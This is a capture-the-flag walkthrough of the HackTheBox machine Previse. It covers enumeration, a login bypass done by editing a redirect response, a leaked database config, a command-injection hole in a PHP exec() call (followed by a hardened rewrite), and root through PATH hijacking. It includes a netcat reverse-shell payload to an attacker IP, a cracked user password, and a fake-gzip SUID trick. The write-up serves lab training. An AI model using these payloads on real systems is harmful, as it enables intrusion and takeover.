HTB Walkthrough: Previse

Today we have a different kind of challenge from HackTheBox called Previse. It is a medium-level box built around misconfigurations in the web application. So without wasting time, let's go.

Level : Medium

Attacking Strategy

  • Network Scanning
    • Nmap
  • Enumeration
    • Content Discovery
    • Bypass login
  • Exploitation
    • Remote Code Execution
  • Privilege Escalation
    • MySQL Dump
    • PATH Environment Privilege Escalation

Walkthrough

IP Address : 10.10.11.104

We start with an Nmap scan to discover open ports, with the default script scan to gather more information about the services running on the target (port 22 and port 80). Nmap also reveals the operating system, which is Linux.

nmap -p- -sC -sV --min-rate 10000 -oN nmap 10.10.11.104
Nmap scan report for 10.10.11.104
Host is up (0.11s latency).
Not shown: 65481 filtered ports, 52 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
|   256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_  256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Previse Login
|_Requested resource was login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

After briefly checking the Nmap result, we start with port 80, which redirects to a login page. We don't have any credentials, so we tried some default ones like admin, test, etc., but failed.

After trying some SQL injection and getting nothing, we fire up the Dirb scanner to enumerate content on the web server with the .php extension, since Wappalyzer reveals this is a PHP-based website.

dirb http://10.10.11.104 -X .php

The result gives us some paths. config.php returns a 200 status code, but visiting it redirects to login. nav.php also returns 200, so we browse it and check the links (account creation, log data, etc.), but visiting them redirects us back to the login page.

After some research we find that we can create an account by modifying the request. So we open Burp, capture the request to "create accounts", and intercept the response to that request.

Change the status code from 300 to 200, as 200 is the success status code.

Now create the account with a username and password and log in to the website.

Once we are in, there are some options like Accounts, Management Menu and Files. Files looks suspicious, so we visit it and find sitebackup.zip.

After downloading sitebackup.zip it's time to analyze it locally. Unzipping it gives us some useful files, such as config.php, which usually holds the database credentials the application uses to run its queries.

<?php
function connectDB(){
    $host = 'localhost';
    $user = 'root';
    $passwd = '[email protected]!:)';
    $db = 'previse';
    $mycon = new mysqli($host, $user, $passwd, $db);
    return $mycon;
}
?>

Here we got the credentials we were hoping for, but when we try them with SSH it fails. After more enumeration of the other files we learn about an exec call where the application runs log_process.py and prints its output.

<?php
session_start();
if (!isset($_SESSION['user'])) {
    header('Location: login.php');
    exit;
}
?>

<?php
// Note: "!$_SERVER['REQUEST_METHOD'] == 'POST'" negates the string first,
// so this check never redirects. It is part of the original source and left as found.
if (!$_SERVER['REQUEST_METHOD'] == 'POST') {
    header('Location: login.php');
    exit;
}

/////////////////////////////////////////////////////////////////////////////////////
//I tried really hard to parse the log delims in PHP, but python was SO MUCH EASIER//
/////////////////////////////////////////////////////////////////////////////////////

// $_POST['delim'] is interpolated into the command string unvalidated and unquoted,
// so any shell metacharacters in it are interpreted by the shell that exec() spawns.
$output = exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}");
echo $output;

$filepath = "/var/www/out.log";
$filename = "out.log";    

if(file_exists($filepath)) {
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="'.basename($filepath).'"');
    header('Expires: 0');
    header('Cache-Control: must-revalidate');
    header('Pragma: public');
    header('Content-Length: ' . filesize($filepath));
    ob_clean(); // Discard data in the output buffer
    flush(); // Flush system headers
    readfile($filepath);
    die();
} else {
    http_response_code(404);
    die();
} 
?>
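As an added example, not code from the Previse box or the original post, here is a hardened rewrite of the handler above showing the fixes a defender would make: the delimiter is checked against an allowlist and passed through escapeshellarg() before exec(), and the session and request-method checks actually stop the script instead of relying on the client to follow a redirect. The helper names validateDelim() and buildLogCommand() are my own; the script path /opt/scripts/log_process.py and the out.log location are taken from the page.

```php
<?php
// Added example, not code from the Previse box or the original post.
// Assumed helper names: validateDelim(), buildLogCommand(). The script path
// /opt/scripts/log_process.py and the out.log location come from the page.
declare(strict_types=1);

// log_process.py only understands these three delimiter names, so anything
// else is rejected before it can reach a shell.
const ALLOWED_DELIMS = ['comma', 'space', 'tab'];

/**
 * Return the delimiter name if it is one of the allowed literals, else null.
 * Strict comparison against fixed strings means characters such as '&', ';'
 * or '|' can never be part of an accepted value.
 */
function validateDelim($delim): ?string
{
    if (!is_string($delim)) {
        return null;
    }
    return in_array($delim, ALLOWED_DELIMS, true) ? $delim : null;
}

/**
 * Build the command line. escapeshellarg() is a second layer of defence: even
 * if the allowlist is widened later, the value is still passed as one quoted
 * argument instead of being interpolated into the command string.
 */
function buildLogCommand(string $delim): string
{
    return '/usr/bin/python /opt/scripts/log_process.py ' . escapeshellarg($delim);
}

if (PHP_SAPI !== 'cli') {
    session_start();
    if (!isset($_SESSION['user'])) {
        header('Location: login.php');
        exit; // a Location header alone does not stop the script; exit does
    }
    // Parenthesised comparison: the original "!$_SERVER[...] == 'POST'"
    // negated the string first and so never redirected.
    if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
        header('Location: login.php');
        exit;
    }

    $delim = validateDelim($_POST['delim'] ?? null);
    if ($delim === null) {
        http_response_code(400);
        exit('unsupported delimiter');
    }

    exec(buildLogCommand($delim), $lines, $status);
    $filepath = '/var/www/out.log';
    if ($status !== 0 || !file_exists($filepath)) {
        http_response_code(404);
        exit;
    }
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="out.log"');
    header('Content-Length: ' . filesize($filepath));
    readfile($filepath);
    exit;
}

// CLI demonstration: a plain name is accepted, a value carrying a shell
// metacharacter is rejected, and an accepted value is quoted on the way out.
foreach (['comma', 'comma&id', 'tab'] as $candidate) {
    $ok = validateDelim($candidate);
    printf("%-10s -> %s\n", $candidate, $ok === null ? 'rejected' : buildLogCommand($ok));
}
```

Run it with the php CLI to see the allowlist decide for each candidate; under a web server the same file serves the download. The allowlist is the real fix, since the script only ever needs one of three fixed words; escapeshellarg() is kept so that a future change to the allowed values cannot reintroduce the interpolation bug.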

Exploitation

After reading the code we simply make the "log data" request with the file delimiter and test for RCE by injecting a ping back to our machine, which we capture with tcpdump. It works, so it's time to get a reverse shell.

After capturing the request, modify delim with the reverse shell payload, and if everything goes well we get a session.

delim=comma%26nc -e /bin/sh 10.10.14.42 1245

Privilege Escalation

Finally we are on the server; time to get root. Following my usual checklist, we start by enumerating SUID binaries and checking the passwd file, but find nothing. Then we dump some data from the database with the credentials we got from the config file. After a few queries we have the hashed password of the user m4lwhere. Once we crack the hash we have the password.

Username : m4lwhere
Password : ilovecody112235!

These credentials are valid for an SSH login to the server. Once we are in as m4lwhere, we check sudoers, and access_backup.sh can be run with root rights without needing the root password.

sudo -l

The script simply backs up the logs by compressing them with gzip, which it calls by name rather than by absolute path, so we perform a PATH environment privilege escalation: a directory we control placed at the front of PATH supplies our own gzip.

cd /tmp
echo "chmod 4777 /bin/bash" >gzip
chmod 777 gzip
export PATH=/tmp:$PATH
sudo /opt/scripts/access_backup.sh
/bin/bash -p
id
cat /root/root.txt

We got root. Collect your gems and enjoy.
